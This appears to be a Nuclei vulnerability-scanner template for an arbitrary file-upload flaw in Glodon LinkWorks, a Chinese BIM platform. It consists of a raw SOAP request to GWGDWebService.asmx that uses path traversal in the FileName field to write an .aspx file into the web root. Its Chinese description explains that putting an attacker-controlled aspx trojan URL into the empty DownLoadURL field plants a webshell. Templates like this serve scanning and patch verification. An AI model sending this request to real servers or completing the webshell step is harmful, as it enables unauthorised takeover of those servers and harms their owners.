id: CVD-2023-2868
info:
  name: 广联达 linkworks GB/LK/ArchiveManagement/Js/GWGDWebService.asmx 文件上传漏洞
  author: SleepingBag945
  severity: critical
  description: |
    广联达 LinkWorks（也称为 GlinkLink 或 GTP-LinkWorks）是广联达公司（Glodon）开发的一种BIM（建筑信息模型）协同平台。广联达是中国领先的数字建造技术提供商之一，专注于为建筑、工程和建筑设计行业提供数字化解决方案。
    利用直接将<DownLoadURL></DownLoadURL>的字段换为自己服务器的aspx木马URL用于下载。木马路径为/Common/{{file_name}}.aspx

variables:
  filename: "{{to_lower(rand_base(10))}}"

http:
  - raw:
      - |
        POST /GB/LK/ArchiveManagement/Js/GWGDWebService.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: text/xml; charset=utf-8
        Accept-Encoding: gzip, deflate

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
         <soapenv:Header/>
         <soapenv:Body>
          <tem:GetGWGDData>
            <!--Optional:-->
            <tem:data>
             <root>
               <GWINFO>
                <公文标题>1</公文标题>
                <拟稿人>拟稿人</拟稿人>
                <主送单位>主送单位</主送单位>
                <主题词>主题词</主题词>
                <印发份数>1</印发份数>
                <签发日期>2022-12-07</签发日期>
               </GWINFO>
               <aa>
                <FileName>./../../../../../../../applications/gtp-default/Web/Common/{{filename}}.aspx</FileName>
                <DownLoadURL></DownLoadURL>
               </aa>
             </root>
            </tem:data>
          </tem:GetGWGDData>
         </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code==500 && contains_all(body,"faultstring","faultcode")'
